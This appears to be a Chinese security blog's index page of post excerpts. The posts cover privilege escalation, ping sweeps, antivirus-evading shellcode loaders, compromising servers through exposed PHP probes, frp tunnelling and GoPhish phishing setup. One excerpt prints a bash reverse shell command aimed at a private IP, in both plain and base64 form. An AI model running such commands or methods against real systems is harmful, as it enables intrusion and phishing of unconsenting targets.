摘要: 一、提权 想了解原理首先要明白什么叫提权,为什么要提权,通常获取到Shell之后,假如我们拿到的是普通权限比如mysql、tomcat等普通应用权限,那我们如果想在内网畅通无阻,那肯定第一步需要获取到管理员最起码要是administrator甚至是system。 这种获取最高权限的方式就叫提权。 二 阅读全文
posted @ 2021-10-12 13:36 wudixiaoherry 阅读(957) 评论(0) 推荐(0) 编辑
摘要: 修改dedecms后台 dede/templets/login.htm dede/images/login-bg.jpg 这是图片路径,删除即可 登陆后左侧的内容 路径是 dede/inc/inc_menu.php 删除你不想要的栏目即可 dede/templets/index_body.htm d 阅读全文
posted @ 2021-06-18 14:25 wudixiaoherry 阅读(109) 评论(0) 推荐(0) 编辑
摘要: 1.Linux使用ping探测存活主机: for k in $( seq 1 255);do ping -c 1 192.168.7.|grep "ttl"|awk -F "[ :]+" '{print $4}'; done 2.Windows使用ping探测存活主机: for /l %i in ( 阅读全文
posted @ 2021-04-06 08:45 wudixiaoherry 阅读(2697) 评论(0) 推荐(1) 编辑
摘要: 借鉴的项目: https://github.com/stormshadow07/HackTheWorld 好久没法文章了,这里做一个免杀的一个测试把。 上面是我借鉴的项目,至于呕出来的代码我就不公开了,这个项目目前还是可以过360的。 先介绍一下这个项目免杀,这个项目主要是shellcode跟加载器 阅读全文
posted @ 2021-03-31 15:40 wudixiaoherry 阅读(232) 评论(0) 推荐(0) 编辑
摘要: 今天研究点比较low的东西,比如php探针到上线,哈哈哈哈,水起来 这个也是看到别的大佬的文章,然后自己去做了一遍发现可行,过程比较简单,由于个人安全问题,下面放出的过程不会很完整。 第一还是要去搜索一个php探针,body="phpstudy探针" && title="phpStudy 探针 20 阅读全文
posted @ 2020-11-02 10:25 wudixiaoherry 阅读(473) 评论(0) 推荐(0) 编辑
摘要: 哎,想起了好久没更新的博客,主要是最近有好多比赛太忙了(其实没有文章让我抄了),今天又看到一篇有意思的博客,cs一起打牌。仔细研究了一下,主要是通过注入上线棋牌服务器,下面我们来研究一下哦: https://www.freebuf.com/articles/web/252278.html 第一步,你 阅读全文
posted @ 2020-10-23 10:42 wudixiaoherry 阅读(672) 评论(0) 推荐(0) 编辑
摘要: 简介:frp是一款使用go语言写的一个轻量级的内网穿透工具,其全名为Fast Reverse Proxy,支持TCP,UDP,HTTP,HTTPS等协议类型,话不多说开始上手。 1.肯定是要有一台vps,这里推荐学生党抓紧时间在什么腾讯云,阿里云去购买一年一百,买到就是赚到。 wget https: 阅读全文
posted @ 2020-08-28 09:33 wudixiaoherry 阅读(1230) 评论(0) 推荐(0) 编辑
摘要: 文章来源与合天智汇 概述: 首先了解一下什么是webshell客户端,先问个问题,什么是客户端,什么是服务端? 很简单,提供服务的就是服务端,要求被服务的就是客户端。那么回到我们的场景中,如果已经种了后门,用于连接后门的程序是要求被服务的,比如执行个ps,目的是为了得到后门所在主机的进程列表,是“被 阅读全文
posted @ 2020-08-13 11:30 wudixiaoherry 阅读(2199) 评论(0) 推荐(1) 编辑
摘要: 一、Linux反弹shell 姿势1 bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+ 阅读全文
posted @ 2020-08-13 11:06 wudixiaoherry 阅读(1303) 评论(0) 推荐(0) 编辑
摘要: 一、首先要了解一下每一个模块的作用: 1:仪表盘,展示被攻击的详情 2:在此配置每次要进行的攻击 3:在这里设置要进行攻击的邮箱地址 4:设置钓鱼邮件模板 5:设置钓鱼页面模板 6:设置发送钓鱼邮件的邮箱 二、实战操作 1、在第6个选项设置要发送邮件的邮箱地址 然后点击绿色按钮进行测试发送,只需要填 阅读全文
posted @ 2020-08-13 10:11 wudixiaoherry 阅读(3331) 评论(0) 推荐(0) 编辑